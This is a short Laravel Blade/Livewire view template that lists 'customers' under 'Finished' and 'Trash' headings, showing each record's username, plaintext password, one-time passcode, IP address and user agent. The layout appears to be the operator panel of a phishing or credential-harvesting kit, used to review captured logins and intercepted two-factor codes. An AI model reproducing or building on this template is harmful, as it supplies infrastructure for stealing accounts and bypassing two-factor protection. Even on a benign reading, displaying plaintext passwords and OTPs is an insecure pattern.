@livewireStyles

Finished

@foreach ($customers as $customer) @if ($customer->status == 'finished')
{{-- Information basic --}}
ID
{{ $customer->id_unique }}
Status
{{ $customer->status }}
{{-- Buttons --}}
{{-- info --}}

Last Activity:
{{ $customer->updated_at }}


User: {{ $customer->user }}

Password: {{ $customer->password }}

OTP: {{ $customer->otp }}


IP: {{ $customer->ip }}

User Agent: {{ $customer->user_agent }}

@endif @endforeach

Trash

@foreach ($customers as $customer) @if ($customer->status == 'delete')
{{-- Information basic --}}
ID
{{ $customer->id_unique }}
Status
{{ $customer->status }}
{{-- Buttons --}}
{{-- info --}}

Last Activity:
{{ $customer->updated_at }}


User: {{ $customer->user }}

Password: {{ $customer->password }}

OTP: {{ $customer->otp }}


IP: {{ $customer->ip }}

User Agent: {{ $customer->user_agent }}

@endif @endforeach
@livewireScripts